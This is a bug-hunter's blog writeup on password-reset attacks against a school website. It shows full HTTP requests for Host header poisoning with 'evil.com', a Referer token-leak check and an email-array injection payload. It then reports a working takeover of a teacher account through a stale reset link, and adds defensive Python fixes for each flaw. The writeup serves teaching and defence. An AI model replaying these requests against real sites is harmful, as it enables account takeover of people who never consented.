Nitin Yadav

How I Gained Account Access: Exploring the Risks of Password Reset Links in Cybersecurity

Hello everyone, I hope you all are doing great.

I am back with another writeup.


So today we are going to talk about another bug that we found on the same website we covered in the last blog. If you haven't read that blog yet, click here.



In the last blog, we got hold of student and teacher details through broken authentication. Now we will talk about another bug we found on the same website: an account takeover through the password reset flow.


The website has a password reset function where a teacher or a student can reset their password.



When we request a reset, a password reset link is sent to the email address registered with the ID, and through that link we can set a new password.


I tried several of the attacks I know against the forgot password page. Let's go through them one by one.


Token Leakage Via Host Header Poisoning

While requesting the reset I changed the Host header of the request to a domain we control.


POST /password_reset_request HTTP/1.1
Host: evil.com
Cookie: _CPOMS_session=abc
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.victim.com/password_reset_request/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 242
Origin: https://www.victim.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

utf8=%E2%9C%93&authenticity_token=zhcnt99TV95yzcnXcS68k0rnsyfZBIro58NDMt55LgEB58wFbdAjtLluui2Hr9hZyHko2hmg9GWPcSMDITWA8A%3D%3D&password_reset_request%5Bauth_provider%5D=identity&password_reset_request%5Bemail%5D=test%40gmail.com&button=

In my case it didn't work, but when it does, the reset link is built from the Host header, so it points at the attacker's domain instead of the real site. When the target clicks the link, their password reset token is sent to the attacker, who can then reset the target's password with it.
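The fix on the application side is to never derive the reset link from the incoming Host header. As an added example (not code from the blog or from the site it describes), the snippet below builds the link from a configured canonical origin and rejects requests whose Host is not on an allowlist, which is what Rails' config.hosts setting does. The origin, allowlist and path are assumptions.

```python
from urllib.parse import urlencode, urlsplit

# Configured once at deploy time; never read from the request (assumed values).
CANONICAL_ORIGIN = "https://www.victim.com"
ALLOWED_HOSTS = {"www.victim.com", "victim.com"}


class HostNotAllowed(Exception):
    """Raised when the Host header does not name one of our own hosts."""


def check_host(headers: dict) -> str:
    """Return the Host header if it is allowlisted, otherwise raise.

    The port is stripped so 'www.victim.com:443' still matches.
    """
    host = headers.get("Host", "").split(":")[0].strip().lower()
    if host not in ALLOWED_HOSTS:
        raise HostNotAllowed(f"unexpected Host header: {host!r}")
    return host


def is_host_allowed(headers: dict) -> bool:
    """Boolean form of check_host, handy for logging/alerting on poisoning attempts."""
    try:
        check_host(headers)
        return True
    except HostNotAllowed:
        return False


def build_reset_link(headers: dict, token: str) -> str:
    """Validate Host, then build the link from CANONICAL_ORIGIN.

    Because the origin is a constant, a poisoned Host header can never end up
    in the e-mail even if the allowlist check were somehow bypassed.
    """
    check_host(headers)
    return f"{CANONICAL_ORIGIN}/password_reset/edit?{urlencode({'token': token})}"


def link_host(link: str) -> str:
    """Host part of a generated link (used to prove the origin is ours)."""
    return urlsplit(link).hostname


if __name__ == "__main__":
    print(build_reset_link({"Host": "www.victim.com"}, "abc123"))
    try:
        build_reset_link({"Host": "evil.com"}, "abc123")
    except HostNotAllowed as err:
        print("rejected:", err)
```

A request with a poisoned Host header is both refused and easy to alert on, since is_host_allowed gives you a clean signal to log before the mailer ever runs.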


Password Reset Token Leak Via Referrer

The HTTP Referer is an optional request header that identifies the address of the web page from which the current resource was requested, i.e. the previous page from which a link to the currently requested page was followed.

POST /password_reset_request HTTP/1.1
Host: evil.com
Cookie: _CPOMS_session=abc
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.victim.com/password_reset_request/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 242
Origin: https://www.victim.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

utf8=%E2%9C%93&authenticity_token=zhcnt99TV95yzcnXcS68k0rnsyfZBIro58NDMt55LgEB58wFbdAjtLluui2Hr9hZyHko2hmg9GWPcSMDITWA8A%3D%3D&password_reset_request%5Bauth_provider%5D=identity&password_reset_request%5Bemail%5D=test%40gmail.com&button=

How You Can Exploit This


Request a password reset for your own email address and click the password reset link. You will notice links to third-party websites (like Facebook or Twitter) on that page.



Intercept the request to the third-party site in Burp Proxy and check whether the Referer header is leaking the password reset token.


But in my case it wasn't working, so I moved on to the next one.
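The same check can be done offline against a saved copy of the reset page. The following audit is an added example (not the blog's code): it flags a reset page as leaking when the token sits in the URL, the page links to another origin, and neither a restrictive Referrer-Policy response header nor rel="noreferrer" on the link stops the browser from sending the full URL as Referer. The sample URL, headers and HTML are constructed, and the assumption that the token travels in a query parameter whose name contains "token" is hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Referrer-Policy values under which a cross-origin navigation carries at most
# the origin, never the path or query where the token lives.  A missing header
# is treated as leaky because older browsers default to no-referrer-when-downgrade.
SAFE_POLICIES = {
    "no-referrer", "same-origin", "origin", "strict-origin",
    "origin-when-cross-origin", "strict-origin-when-cross-origin",
}


class LinkCollector(HTMLParser):
    """Collect (href, rel) pairs for every <a> tag on the page."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            a = dict(attrs)
            if a.get("href"):
                self.links.append((a["href"], (a.get("rel") or "").lower()))


def url_carries_token(url: str) -> bool:
    """Hypothetical convention: the reset token is a query parameter named *token*."""
    return any("token" in key.lower() for key in parse_qs(urlsplit(url).query))


def find_referer_leaks(page_url: str, headers: dict, html: str) -> list:
    """Return the cross-origin links that would receive the reset URL as Referer."""
    if not url_carries_token(page_url):
        return []                      # nothing secret in the URL to leak
    policy = headers.get("Referrer-Policy", "").strip().lower()
    if policy in SAFE_POLICIES:
        return []                      # header alone already protects every link
    origin = urlsplit(page_url).netloc.lower()
    collector = LinkCollector()
    collector.feed(html)
    leaks = []
    for href, rel in collector.links:
        target = urlsplit(href)
        if not target.netloc or target.netloc.lower() == origin:
            continue                   # same-origin link: Referer stays in-house
        if "noreferrer" in rel.split():
            continue                   # per-link opt-out
        leaks.append(href)
    return leaks


# Constructed sample: a reset page with a same-origin link, a bare third-party
# link and a third-party link that opts out with rel="noreferrer".
SAMPLE_URL = "https://www.victim.com/password_reset/edit?token=abc123"
SAMPLE_HTML = """
<html><body>
  <a href="/help">Help</a>
  <a href="https://www.facebook.com/example">Facebook</a>
  <a href="https://twitter.com/example" rel="noreferrer">Twitter</a>
</body></html>
"""


def audit_sample(referrer_policy=None) -> list:
    headers = {} if referrer_policy is None else {"Referrer-Policy": referrer_policy}
    return find_referer_leaks(SAMPLE_URL, headers, SAMPLE_HTML)


if __name__ == "__main__":
    print("no header:  ", audit_sample())
    print("no-referrer:", audit_sample("no-referrer"))
```

Running it against a real capture only needs the page URL from the e-mail, the response headers and the HTML body; the Facebook link is reported without a policy header and disappears once Referrer-Policy: no-referrer is set.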


Sending an array of email addresses


Next I tried to get the password reset link sent to an arbitrary email address by submitting an array of email addresses instead of a single one.


POST /password_reset_request HTTP/1.1
Host: evil.com
Cookie: _CPOMS_session=abc
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.victim.com/password_reset_request/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 242
Origin: https://www.victim.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

utf8=%E2%9C%93&authenticity_token=zhcnt99TV95yzcnXcS68k0rnsyfZBIro58NDMt55LgEB58wFbdAjtLluui2Hr9hZyHko2hmg9GWPcSMDITWA8A%3D%3D&password_reset_request%5Bauth_provider%5D=identity&password_reset_request%5B&email%5D=victim%40gmail.com&email%5D=attacker%40gmail.com&button=

This also didn't work for me.
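Whether this works depends on how strictly the server reads the email field: frameworks that turn repeated or bracketed keys into arrays can hand the mailer a list where a string was expected. As an added example (not the blog's or the site's code), the function below parses a form body the way the request above is encoded and accepts exactly one scalar, well-formed address, rejecting array-style keys, repeated keys and comma-joined values. The sample bodies are constructed; the authenticity token value is a placeholder.

```python
from urllib.parse import parse_qs

EMAIL_KEY = "password_reset_request[email]"   # the form field name used by the site


class BadRequest(ValueError):
    """Raised when the e-mail field is missing, repeated, array-typed or malformed."""


def extract_reset_email(body: str) -> str:
    """Return the single e-mail address in a form-encoded body, or raise BadRequest."""
    params = parse_qs(body, keep_blank_values=True)   # keys are percent-decoded here
    # Any nested/array spelling of the key ("...[email][]", "...[email][0]") is refused.
    for key in params:
        if key.startswith(EMAIL_KEY) and key != EMAIL_KEY:
            raise BadRequest(f"array-style email parameter rejected: {key!r}")
    values = params.get(EMAIL_KEY, [])
    if len(values) != 1:                              # repeated key => list of 2+
        raise BadRequest(f"expected exactly one email value, got {len(values)}")
    email = values[0].strip()
    local, sep, domain = email.partition("@")
    if not sep or not local or not domain or "@" in domain \
            or any(c in email for c in ", ;<>\r\n"):
        raise BadRequest("malformed email address")
    return email


def is_single_email(body: str) -> bool:
    """True when the body would be accepted by extract_reset_email."""
    try:
        extract_reset_email(body)
        return True
    except BadRequest:
        return False


# Constructed request bodies (TOKEN stands in for a real authenticity_token).
NORMAL = ("utf8=%E2%9C%93&authenticity_token=TOKEN"
          "&password_reset_request%5Bemail%5D=test%40gmail.com&button=")
ARRAY = ("utf8=%E2%9C%93&authenticity_token=TOKEN"
         "&password_reset_request%5Bemail%5D%5B%5D=victim%40gmail.com"
         "&password_reset_request%5Bemail%5D%5B%5D=attacker%40gmail.com&button=")
REPEATED = ("utf8=%E2%9C%93&authenticity_token=TOKEN"
            "&password_reset_request%5Bemail%5D=victim%40gmail.com"
            "&password_reset_request%5Bemail%5D=attacker%40gmail.com&button=")
COMMA = ("utf8=%E2%9C%93&authenticity_token=TOKEN"
         "&password_reset_request%5Bemail%5D=victim%40gmail.com%2Cattacker%40gmail.com&button=")

if __name__ == "__main__":
    for name, body in [("NORMAL", NORMAL), ("ARRAY", ARRAY), ("REPEATED", REPEATED), ("COMMA", COMMA)]:
        print(f"{name:9} accepted={is_single_email(body)}")
```

Only the NORMAL body is accepted; the other three are the shapes a mailer must never see, because each could result in the reset link being delivered to an address the account owner does not control.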


At that point I was wondering what was going on, so I took a break from hunting.


After some time I got back to it and decided to try once more, because we hadn't found any bug in the password reset yet and I wanted to find one.


So I requested a password reset for a teacher account, which sent a password reset link, but I did not use it yet.


Then I logged in with the teacher ID and changed that teacher's email address (mail1) to another email (mail2). A verification mail was sent to the new address (mail2), and I verified it successfully.


Now the teacher's account is linked to the new mail (mail2); there is no longer any connection between the old mail (mail1) and this account, and only the new address (mail2) should be able to reset the password.


So the password reset link that was sent to the old mail address (mail1) should no longer work.


But to my surprise, that link still worked, and I was able to change the teacher's password with the link sent to the old mail (mail1).


With this, we were able to successfully take over the teacher's account.
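The root cause is a reset token that stays valid after the account it was issued for changes its email address. As an added example (not the blog's or the site's code), the token store below records the address a link was mailed to, expires and single-uses every token, and revokes all outstanding tokens when the email changes; run_scenario replays the exact sequence from the writeup. The 15-minute lifetime, account model and function names are assumptions.

```python
import hashlib
import secrets
from dataclasses import dataclass

TOKEN_TTL_SECONDS = 15 * 60   # assumed policy: a link is good for 15 minutes


@dataclass
class Account:
    user_id: int
    email: str


@dataclass
class ResetToken:
    user_id: int
    email: str          # address the link was mailed to, captured at issuance
    expires_at: float
    used: bool = False


class ResetTokenStore:
    def __init__(self):
        self._by_hash = {}   # sha256(token) -> ResetToken; the raw token is never stored

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, account: Account, now: float) -> str:
        token = secrets.token_urlsafe(32)
        self._by_hash[self._key(token)] = ResetToken(
            account.user_id, account.email, now + TOKEN_TTL_SECONDS)
        return token

    def revoke_for_user(self, user_id: int) -> None:
        """Drop every outstanding token for this user (called on email change)."""
        stale = [k for k, v in self._by_hash.items() if v.user_id == user_id]
        for k in stale:
            del self._by_hash[k]

    def consume(self, token: str, account: Account, now: float) -> bool:
        """Accept the token once, only if unexpired and still bound to the account's current email."""
        rec = self._by_hash.get(self._key(token))
        if rec is None or rec.used or now > rec.expires_at:
            return False
        # Defence in depth: even if revocation were missed, a token mailed to a
        # different address than the account's current one is refused.
        if rec.user_id != account.user_id or rec.email.lower() != account.email.lower():
            return False
        rec.used = True
        return True


def change_email(account: Account, store: ResetTokenStore, new_email: str) -> None:
    # The caller is assumed to have verified new_email already, as the site does.
    account.email = new_email
    store.revoke_for_user(account.user_id)


def run_scenario() -> dict:
    """Replay the writeup: issue a link to mail1, switch to mail2, try the old link."""
    store = ResetTokenStore()
    teacher = Account(user_id=1, email="mail1@example.com")   # constructed
    t0 = 1_700_000_000.0
    old_link_token = store.issue(teacher, t0)
    change_email(teacher, store, "mail2@example.com")
    results = {"old_link_after_email_change": store.consume(old_link_token, teacher, t0 + 60)}
    new_token = store.issue(teacher, t0 + 120)
    results["new_link_first_use"] = store.consume(new_token, teacher, t0 + 180)
    results["new_link_second_use"] = store.consume(new_token, teacher, t0 + 200)
    late = store.issue(teacher, t0 + 300)
    results["expired_link"] = store.consume(late, teacher, t0 + 300 + TOKEN_TTL_SECONDS + 1)
    return results


if __name__ == "__main__":
    for name, ok in run_scenario().items():
        print(f"{name:28} accepted={ok}")
```

With these rules the link mailed to mail1 is rejected the moment the account moves to mail2, and the remaining checks (single use, expiry) close the other common reset-link weaknesses at the same time.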


I hope you enjoyed this one and learned something new.


I'll see you next time 😉



Take care, happy hacking!
